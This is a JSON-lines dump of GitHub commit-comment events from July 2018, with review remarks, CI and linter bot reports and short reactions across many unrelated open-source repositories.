{"id":"7944821447","type":"CommitCommentEvent","actor":{"login":"lebleut"},"repo":{"name":"lebleut/Tooltipy-OOP"},"payload":{"comment":{"id":29659391,"position":null,"line":null,"path":null,"commit_id":"a84092bbcbb926f0a2c7c840ba879cb32cdb3c1e","created_at":"2018-07-10T16:02:58Z","updated_at":"2018-07-10T16:02:58Z","author_association":"OWNER","body":"Tip used : don't use checkbox in bulk edit so I can implement the NO CHANGE feature"}},"created_at":"2018-07-10T16:02:58Z"}
{"id":"7944822901","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/fletcher-feedstock"},"payload":{"comment":{"id":29659396,"position":null,"line":null,"path":null,"commit_id":"56824927976bf780728e4a3370a5959263cc7352","created_at":"2018-07-10T16:03:13Z","updated_at":"2018-07-10T16:03:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xhochy were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-10T16:03:13Z"}
{"id":"7944823112","type":"CommitCommentEvent","actor":{"login":"TimCliff"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":29659397,"position":223,"line":1748,"path":"libraries/chain/database.cpp","commit_id":"2fbebba18dd4dc277797547c2b5b3973e7efdbe4","created_at":"2018-07-10T16:03:15Z","updated_at":"2018-07-10T16:03:15Z","author_association":"CONTRIBUTOR","body":"Sorry, nevermind. Found it."}},"created_at":"2018-07-10T16:03:15Z"}
{"id":"7944823601","type":"CommitCommentEvent","actor":{"login":"capodecima"},"repo":{"name":"Ch0wW/odamex"},"payload":{"comment":{"id":29659398,"position":null,"line":null,"path":null,"commit_id":"520720a53dcd1bff1ab427ba3bc21cc81548bb00","created_at":"2018-07-10T16:03:20Z","updated_at":"2018-07-10T16:03:20Z","author_association":"NONE","body":"I like it. 👍 "}},"created_at":"2018-07-10T16:03:20Z"}
{"id":"7944840427","type":"CommitCommentEvent","actor":{"login":"EnricoMingo"},"repo":{"name":"cogimon/rtt-gazebo-robot-sim"},"payload":{"comment":{"id":29659425,"position":null,"line":null,"path":null,"commit_id":"a9877054d8e89c9258e961b48f717d2bbedbcc91","created_at":"2018-07-10T16:06:05Z","updated_at":"2018-07-10T16:06:05Z","author_association":"COLLABORATOR","body":"Hello, the XBotCoreModel has been moved inside the XBotInterface. From the\npoint of view of rtt-gazebo-robot-sim nothing change but now it depends\nalso on XBotInterface package (and not anymore from XBotCoreModel)\n\nIl giorno mar 10 lug 2018 alle ore 12:59 Dennis Leroy Wigand <\nnotifications@github.com> ha scritto:\n\n> Also does not work for me, since I do not have XBotCoreInterface... Can we\n> make this catkin agnostic?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cogimon/rtt-gazebo-robot-sim/commit/a9877054d8e89c9258e961b48f717d2bbedbcc91#commitcomment-29654588>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFQayurVsw81CXg4apnbLmEOAWZrXpwRks5uFIj0gaJpZM4VJCE6>\n> .\n>\n\n\n-- \nPhD Mingo Hoffman Enrico\nIstituto Italiano di Tecnologia, Genova\n"}},"created_at":"2018-07-10T16:06:05Z"}
{"id":"7944844399","type":"CommitCommentEvent","actor":{"login":"vemiz"},"repo":{"name":"vemiz/firstWordpressTheme"},"payload":{"comment":{"id":29659434,"position":null,"line":null,"path":null,"commit_id":"927956ad6a3338068d5928f3fd7d8bd00e1fed98","created_at":"2018-07-10T16:06:45Z","updated_at":"2018-07-10T16:06:45Z","author_association":"OWNER","body":"Following this tutorial https://www.youtube.com/watch?annotation_id=annotation_1320790587&feature=iv&src_vid=NF6r3Ejpris&v=Sz0z-Gyp3nA"}},"created_at":"2018-07-10T16:06:45Z"}
{"id":"7944846310","type":"CommitCommentEvent","actor":{"login":"artofdestroy"},"repo":{"name":"artofdestroy/mkrwan1300-fw"},"payload":{"comment":{"id":29659439,"position":null,"line":null,"path":null,"commit_id":"8af64bb8813b5135611d10d95d2b3aa76b53865e","created_at":"2018-07-10T16:07:04Z","updated_at":"2018-07-10T16:07:04Z","author_association":"OWNER","body":"\"%s\" will only print till NULL byte"}},"created_at":"2018-07-10T16:07:04Z"}
{"id":"7944860211","type":"CommitCommentEvent","actor":{"login":"lorranfoliveira"},"repo":{"name":"lorranfoliveira/code"},"payload":{"comment":{"id":29659460,"position":7,"line":3,"path":"main.py","commit_id":"2be580a55ab748b9acdacfb5362290564ae8e129","created_at":"2018-07-10T16:09:29Z","updated_at":"2018-07-10T16:09:29Z","author_association":"OWNER","body":"Teste"}},"created_at":"2018-07-10T16:09:29Z"}
{"id":"7944862032","type":"CommitCommentEvent","actor":{"login":"leofeyer"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29659463,"position":13,"line":951,"path":"src/Resources/contao/drivers/DC_Table.php","commit_id":"e45c20cc5c5b642ae0b17bc413275efc9836062e","created_at":"2018-07-10T16:09:48Z","updated_at":"2018-07-10T16:09:48Z","author_association":"MEMBER","body":"It is not breaking anything. It is a new feature in Contao 4.6, namely a working \"copy of\" implementation. No fallback needed – especially not the broken implementation we had to use so far."}},"created_at":"2018-07-10T16:09:48Z"}
{"id":"7944862740","type":"CommitCommentEvent","actor":{"login":"graham1228"},"repo":{"name":"digitalrebar/provision-content"},"payload":{"comment":{"id":29659465,"position":null,"line":null,"path":null,"commit_id":"d03996dbf5c824562a23933e5eaf06aeb0138607","created_at":"2018-07-10T16:09:55Z","updated_at":"2018-07-10T16:09:55Z","author_association":"NONE","body":"@galthaus I think we need to make sure this is more permanent. This will be lost a reboot.\r\n\r\nSomething like this:\r\n```\r\necho \"MAKE SURE bridge-nf-call-iptables CONTAINS 1 - kubeadm requirement\"\r\nif [ ! -f /etc/sysctl.d/99-net.bridge.bridge-nf-call-iptables ]; then\r\n  cat <<EOF >/etc/sysctl.d/99-net.bridge.bridge-nf-call-iptables\r\nnet.bridge.bridge-nf-call-iptables=1\r\nEOF\r\nsysctl -p /etc/sysctl.d/99-net.bridge.bridge-nf-call-iptables\r\nfi\r\nVALUE=`sysctl -n net.bridge.bridge-nf-call-iptables`\r\n[ $VALUE != 1 ] && sysctl -w net.bridge.bridge-nf-call-iptables=1\r\n```"}},"created_at":"2018-07-10T16:09:55Z"}
{"id":"7944866389","type":"CommitCommentEvent","actor":{"login":"darix"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29659470,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-10T16:10:31Z","updated_at":"2018-07-10T16:10:31Z","author_association":"NONE","body":"The default could be normal build and have a param for relocatable builds "}},"created_at":"2018-07-10T16:10:31Z"}
{"id":"7944868834","type":"CommitCommentEvent","actor":{"login":"VikingTristan"},"repo":{"name":"PayEx/design.payex.com"},"payload":{"comment":{"id":29659473,"position":5,"line":7,"path":"src/App/Documentation/components/ProgressTracker/index.js","commit_id":"1a12d5aa0f942a7920efe1022af8c519756dfd5a","created_at":"2018-07-10T16:10:54Z","updated_at":"2018-07-10T16:10:54Z","author_association":"CONTRIBUTOR","body":"Great! If you're importing a lot of files from the components folder, which I imagine you do, you can shorten this even more by adding something like this to the configuration: `{\r\n        \"rootPathPrefix\": \"@\",\r\n        \"rootPathSuffix\": \"./src/App/components\"\r\n      }`\r\n\r\nThen your import will be\r\n`import ProgressTrackerComponent from \"@/ProgressTracker\";`"}},"created_at":"2018-07-10T16:10:54Z"}
{"id":"7944871478","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29659477,"position":5,"line":5,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"9cd9397c870127e56d04063faef8a19c23f85aa9","created_at":"2018-07-10T16:11:20Z","updated_at":"2018-07-10T16:11:20Z","author_association":"NONE","body":"Тут надо было по-другому сделать) Не использовать стандартные классы и методы, а написать свой метод ```println()```, к которому можно было бы обратиться ровно в таком виде: ```System.out.println(\"Hello World\");```"}},"created_at":"2018-07-10T16:11:20Z"}
{"id":"7944872177","type":"CommitCommentEvent","actor":{"login":"flash-gordon"},"repo":{"name":"dry-rb/dry-validation"},"payload":{"comment":{"id":29659478,"position":5,"line":9,"path":"lib/dry/validation/input_processor_compiler/sanitizer.rb","commit_id":"5ae8a8ef4e746fdcd81fbc61d0ae1bae88b067ad","created_at":"2018-07-10T16:11:28Z","updated_at":"2018-07-10T16:11:28Z","author_association":"MEMBER","body":"predicate names are from `dry-logic`, changing them would be another breaking change. Perhaps, we can have aliases for them, though."}},"created_at":"2018-07-10T16:11:28Z"}
{"id":"7944872957","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.indexer"},"payload":{"comment":{"id":29659479,"position":null,"line":null,"path":null,"commit_id":"7b81b88beef40b4e9bd00262da103a1e4736284a","created_at":"2018-07-10T16:11:36Z","updated_at":"2018-07-10T16:11:36Z","author_association":"NONE","body":"@pbauer Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.indexer/7/violations\n```\nplone/indexer/tests.py:44:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/indexer/decorator.py:44:30: C812 missing trailing comma\nplone/indexer/wrapper.py:60:65: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-10T16:11:36Z"}
{"id":"7944873763","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29659481,"position":5,"line":5,"path":"src/main/java/ComputerModel/ComputerModel.java","commit_id":"9cd9397c870127e56d04063faef8a19c23f85aa9","created_at":"2018-07-10T16:11:44Z","updated_at":"2018-07-10T16:11:44Z","author_association":"NONE","body":"мОдель :)"}},"created_at":"2018-07-10T16:11:44Z"}
{"id":"7944880166","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29659499,"position":null,"line":null,"path":null,"commit_id":"10de63aa8bd52eb01f22722f31697eeaeb9cea39","created_at":"2018-07-10T16:12:41Z","updated_at":"2018-07-10T16:12:41Z","author_association":"MEMBER","body":"More explanations...?\r\nShould the \"ALTER TABLE personal_agenda modify id INT NOT NULL\" (just before the hasPrimaryKey() call) not be removed?\r\n"}},"created_at":"2018-07-10T16:12:41Z"}
{"id":"7944882312","type":"CommitCommentEvent","actor":{"login":"bsdimp"},"repo":{"name":"evadot/freebsd"},"payload":{"comment":{"id":29659503,"position":26,"line":190,"path":"release/tools/arm.subr","commit_id":"85b6ac35ea9b03bee56aa79d144f7ce0328572e6","created_at":"2018-07-10T16:13:01Z","updated_at":"2018-07-10T16:13:01Z","author_association":"NONE","body":"Is EMBEDDED_TARGET_ARCH really ${MACHINE}? This implies it, or it's wrong. "}},"created_at":"2018-07-10T16:13:01Z"}
{"id":"7944884736","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29659510,"position":null,"line":null,"path":null,"commit_id":"25f2082bcfc3f8559a075a9da29b9d2d06ad3a27","created_at":"2018-07-10T16:13:23Z","updated_at":"2018-07-10T16:13:23Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/25f2082bcfc3f8559a075a9da29b9d2d06ad3a27/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-10T16:13:23Z"}
{"id":"7944887819","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.indexer"},"payload":{"comment":{"id":29659516,"position":null,"line":null,"path":null,"commit_id":"bd98474fa2f1d6d47f495d9ff97658f464e205bf","created_at":"2018-07-10T16:13:51Z","updated_at":"2018-07-10T16:13:51Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.indexer/8/violations\n```\nplone/indexer/tests.py:31:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/indexer/decorator.py:44:30: C812 missing trailing comma\nplone/indexer/wrapper.py:61:65: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-10T16:13:51Z"}
{"id":"7944888816","type":"CommitCommentEvent","actor":{"login":"lundibundi"},"repo":{"name":"hovancik/stretchly"},"payload":{"comment":{"id":29659519,"position":13,"line":38,"path":"package.json","commit_id":"3dc28c5fa658a49efe84aae6b64fef5299701288","created_at":"2018-07-10T16:14:01Z","updated_at":"2018-07-10T16:14:01Z","author_association":"CONTRIBUTOR","body":"see https://github.com/hovancik/stretchly/issues/267#issuecomment-403880245"}},"created_at":"2018-07-10T16:14:01Z"}
{"id":"7944890324","type":"CommitCommentEvent","actor":{"login":"arquio"},"repo":{"name":"travelgateX/graphql-schema"},"payload":{"comment":{"id":29659524,"position":1,"line":1,"path":"hotelx/hotstc/inputs/input_HotelXRoomQueryInput.graphql","commit_id":"19e4f994c82be38529ce1ba3ad1e6f3cd4ae4c4d","created_at":"2018-07-10T16:14:14Z","updated_at":"2018-07-10T16:14:14Z","author_association":"MEMBER","body":"@vpiza: review this comments in you code"}},"created_at":"2018-07-10T16:14:14Z"}
{"id":"7944892404","type":"CommitCommentEvent","actor":{"login":"Wynadorn"},"repo":{"name":"lithammer/NeavUI"},"payload":{"comment":{"id":29659528,"position":null,"line":null,"path":null,"commit_id":"da16116714d0139850161e14468860d9c33a1e07","created_at":"2018-07-10T16:14:32Z","updated_at":"2018-07-10T16:14:32Z","author_association":"NONE","body":"🎉 Congrats! 🎉"}},"created_at":"2018-07-10T16:14:32Z"}
{"id":"7944893096","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29659529,"position":11,"line":11,"path":"src/main/java/ComputerModel/ComputerModel.java","commit_id":"9cd9397c870127e56d04063faef8a19c23f85aa9","created_at":"2018-07-10T16:14:38Z","updated_at":"2018-07-10T16:14:38Z","author_association":"NONE","body":"Так можно, но получается простовато, попробуй на несколько уровней глубже детализировать модель компьютера.\r\n\r\nК тому же, ```processor```` - это не очень подходящее имя для метода. методы описывают какие-то действия, а сущности описываются классами. Попробуй использовать для всех компонентов компьютера использовать вложенные классы, а для описания действий, совершаемых ими - методы"}},"created_at":"2018-07-10T16:14:38Z"}
{"id":"7944898361","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29659541,"position":15,"line":363,"path":"src/cgutils.cpp","commit_id":"d8034721883dbd452123f8cf3bccb4285fd59f68","created_at":"2018-07-10T16:15:25Z","updated_at":"2018-07-10T16:15:25Z","author_association":"MEMBER","body":"yes, thanks"}},"created_at":"2018-07-10T16:15:25Z"}
{"id":"7944898847","type":"CommitCommentEvent","actor":{"login":"cproc"},"repo":{"name":"cproc/genode"},"payload":{"comment":{"id":29659542,"position":null,"line":null,"path":null,"commit_id":"6e976c65834eeb78b5463c9ef0e2951cb5167ea8","created_at":"2018-07-10T16:15:29Z","updated_at":"2018-07-10T16:15:29Z","author_association":"OWNER","body":"@chelmuth: please consider for staging"}},"created_at":"2018-07-10T16:15:29Z"}
{"id":"7944900749","type":"CommitCommentEvent","actor":{"login":"greg-1-anderson"},"repo":{"name":"greg-1-anderson/gk-8"},"payload":{"comment":{"id":29659548,"position":null,"line":null,"path":null,"commit_id":"4ea776ce48c80864d716715688172da5d001f3ef","created_at":"2018-07-10T16:15:46Z","updated_at":"2018-07-10T16:15:46Z","author_association":"OWNER","body":"Created multidev environment [gk-8#pr-depsupda](https://dashboard.pantheon.io/sites/5cbd78f8-3a96-492a-beb0-f892421708d8#pr-depsupda).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-depsupda-gk-8.pantheonsite.io/)"}},"created_at":"2018-07-10T16:15:46Z"}
{"id":"7944900997","type":"CommitCommentEvent","actor":{"login":"pitaj"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":29659549,"position":7,"line":77,"path":"src/user/blocks.js","commit_id":"91f9c60660c2d11d3416f0af7419021604f4bead","created_at":"2018-07-10T16:15:49Z","updated_at":"2018-07-10T16:15:49Z","author_association":"CONTRIBUTOR","body":"`uid = parseInt(uid, 10)` would reduce one use of it"}},"created_at":"2018-07-10T16:15:49Z"}
{"id":"7944901449","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29659550,"position":117,"line":199,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.h","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T16:15:52Z","updated_at":"2018-07-10T16:15:52Z","author_association":"CONTRIBUTOR","body":"Right.\r\n\r\nThe way references \"collapse\" is with this table.\r\n\r\nhttps://stackoverflow.com/questions/13725747/concise-explanation-of-reference-collapsing-rules-requested-1-a-a-2\r\n\r\nAnd && can always be passed as &\r\n\r\nFurther, any non-const can always be passed as const.\r\n\r\nSo if a user passes as an rvalue-reference (with std::move, or with an unnamed temporary like the return value from a function call), but the function accepts the parameter by const&, then the parameter is just passed as const&"}},"created_at":"2018-07-10T16:15:52Z"}
{"id":"7944903803","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29659553,"position":13,"line":99,"path":"Source/Foundation/bsfCore/Renderer/BsRenderer.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T16:16:15Z","updated_at":"2018-07-10T16:16:15Z","author_association":"CONTRIBUTOR","body":"Oops. Yea, you just return entry->mTaskWorker();, not \"complete = ...\" Sorry bout that."}},"created_at":"2018-07-10T16:16:15Z"}
{"id":"7944911814","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29659569,"position":270,"line":270,"path":"rules/definitions.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T16:17:35Z","updated_at":"2018-07-10T16:17:35Z","author_association":"COLLABORATOR","body":"Changed - this was working code was't finished yet ;)"}},"created_at":"2018-07-10T16:17:35Z"}
{"id":"7944915749","type":"CommitCommentEvent","actor":{"login":"IDanette"},"repo":{"name":"guidiass21/RT-18_TCC"},"payload":{"comment":{"id":29659577,"position":null,"line":null,"path":null,"commit_id":"a4f1a614365a03115f94de8d71b8d593e1c6055e","created_at":"2018-07-10T16:18:17Z","updated_at":"2018-07-10T16:18:17Z","author_association":"COLLABORATOR","body":"jesus que isso"}},"created_at":"2018-07-10T16:18:17Z"}
{"id":"7944918390","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29659580,"position":39,"line":39,"path":"rules/manager.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T16:18:45Z","updated_at":"2018-07-10T16:18:45Z","author_association":"COLLABORATOR","body":"The script doesn't change the the environment does, we dynamically add stuff. This is just an up val set on the lua function."}},"created_at":"2018-07-10T16:18:45Z"}
{"id":"7944920007","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29659582,"position":24,"line":119,"path":"Source/Foundation/bsfEngine/BsApplication.cpp","commit_id":"644a0743f7b59b17e75904d040418b6d02413107","created_at":"2018-07-10T16:19:03Z","updated_at":"2018-07-10T16:19:03Z","author_association":"CONTRIBUTOR","body":"With a trinary conditional, you also have the luxury of using const& for the overlayCamera variable.\r\n\r\nThat'll reduce reference count changes by one, and then you don't have to worry about using std::move() on line 130 or 132"}},"created_at":"2018-07-10T16:19:03Z"}
{"id":"7944920623","type":"CommitCommentEvent","actor":{"login":"evadot"},"repo":{"name":"evadot/freebsd"},"payload":{"comment":{"id":29659584,"position":26,"line":190,"path":"release/tools/arm.subr","commit_id":"85b6ac35ea9b03bee56aa79d144f7ce0328572e6","created_at":"2018-07-10T16:19:10Z","updated_at":"2018-07-10T16:19:10Z","author_association":"OWNER","body":"Nope that was supposed to be EMBBEDED_TARGET"}},"created_at":"2018-07-10T16:19:10Z"}
{"id":"7944927722","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29659601,"position":96,"line":96,"path":"rules/manager.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T16:20:24Z","updated_at":"2018-07-10T16:20:24Z","author_association":"COLLABORATOR","body":"FWIW - I typically use camelCase for private/local things as way to distinguish them."}},"created_at":"2018-07-10T16:20:24Z"}
{"id":"7944931850","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29659615,"position":null,"line":null,"path":null,"commit_id":"535bcc4802ab48547c27d8902bf40ce23f26c66d","created_at":"2018-07-10T16:21:08Z","updated_at":"2018-07-10T16:21:08Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `3f2e5cb0-845d-11e8-98b6-9e428ceddeaa`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T16:21:08Z"}
{"id":"7944935241","type":"CommitCommentEvent","actor":{"login":"albertoriolly"},"repo":{"name":"albertoriolly/Hydroponic-Control-System"},"payload":{"comment":{"id":29659618,"position":null,"line":null,"path":null,"commit_id":"e801962f05b8865c417b494ce6e55f1fa30cf34f","created_at":"2018-07-10T16:21:43Z","updated_at":"2018-07-10T16:21:43Z","author_association":"OWNER","body":"What is this?\r\n### Really\r\n**How can you do that?**\r\n_Now its italic bro_\r\n\r\n> Quote from my \r\n\r\n> mind\r\n\r\n`int x;\r\nx = 20;`\r\n[https://youtu.be/oPpnCh7InLY](url)\r\n\r\n- this is bullet for my valentine\r\n\r\n1. this is number\r\n\r\n-"}},"created_at":"2018-07-10T16:21:43Z"}
{"id":"7944938293","type":"CommitCommentEvent","actor":{"login":"umferth"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29659629,"position":155,"line":155,"path":"rules/manager.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T16:22:16Z","updated_at":"2018-07-10T16:22:16Z","author_association":"COLLABORATOR","body":"That would mean i would have two blocks of code, this way i have one loop which might be a single rule.  we might want to add other checks down the road.  for example, maybe rule type.. I kind of like it way it is, plus really being able to run a one-off rule is mostly a debug thing right now."}},"created_at":"2018-07-10T16:22:16Z"}
{"id":"7944939792","type":"CommitCommentEvent","actor":{"login":"khalilif751"},"repo":{"name":"railsgirls/railsgirls.github.io"},"payload":{"comment":{"id":29659630,"position":null,"line":null,"path":null,"commit_id":"672e9862f07a63b6f3dfab9a16f9a93468c0690e","created_at":"2018-07-10T16:22:32Z","updated_at":"2018-07-10T16:22:32Z","author_association":"NONE","body":"672e9862"}},"created_at":"2018-07-10T16:22:32Z"}
{"id":"7944943883","type":"CommitCommentEvent","actor":{"login":"mbeacom"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29659634,"position":5,"line":230,"path":"app/dashboard/router.py","commit_id":"054f16346f35a6229d4334979c7118b9348637ae","created_at":"2018-07-10T16:23:14Z","updated_at":"2018-07-10T16:23:14Z","author_association":"MEMBER","body":"We could probably do: `and order_by in ['created_on', 'modified_on', 'id', 'pk']` or something similar if we want to restrict the fields that can be used to sort the response values."}},"created_at":"2018-07-10T16:23:14Z"}
{"id":"7944943932","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29659635,"position":null,"line":null,"path":null,"commit_id":"d12890175cd61a6a5ceb2dbfad5a38fe90626b57","created_at":"2018-07-10T16:23:14Z","updated_at":"2018-07-10T16:23:14Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/jest-monorepo.211`__ :crossed_fingers: [`renovate/jest-monorepo`](https://github.com/streamich/ci-scripts/tree/renovate/jest-monorepo) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/211) :tada:"}},"created_at":"2018-07-10T16:23:14Z"}
{"id":"7944945596","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29659637,"position":null,"line":null,"path":null,"commit_id":"73d9fe5a8977e9da56973f940c9aba5a18c838fe","created_at":"2018-07-10T16:23:31Z","updated_at":"2018-07-10T16:23:31Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `94357f5e-845d-11e8-9b61-68b432e73c63`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T16:23:31Z"}
{"id":"7944950778","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29659643,"position":null,"line":null,"path":null,"commit_id":"dda5bcedea18009a26adbb2dd01c82a7edfe9917","created_at":"2018-07-10T16:24:25Z","updated_at":"2018-07-10T16:24:25Z","author_association":"CONTRIBUTOR","body":"👌"}},"created_at":"2018-07-10T16:24:25Z"}
{"id":"7944977292","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29659683,"position":null,"line":null,"path":null,"commit_id":"4afb6a7cc0d84ccdaed29031a1a283532a41f090","created_at":"2018-07-10T16:29:07Z","updated_at":"2018-07-10T16:29:07Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2931 of 2932 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4afb6a7cc0d84ccdaed29031a1a283532a41f090-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T16:29:07Z"}
{"id":"7944981823","type":"CommitCommentEvent","actor":{"login":"StefanKarpinski"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29659693,"position":null,"line":null,"path":null,"commit_id":"f25b34c47ed62e71daa73c55c67e9cc9f96780ad","created_at":"2018-07-10T16:29:57Z","updated_at":"2018-07-10T16:29:57Z","author_association":"MEMBER","body":"To be clear: I think you can replace this patch with that one since with that change, the pre-compilation of Documenter should no longer break even when `JULIA_LOAD_PATH` is set to something."}},"created_at":"2018-07-10T16:29:57Z"}
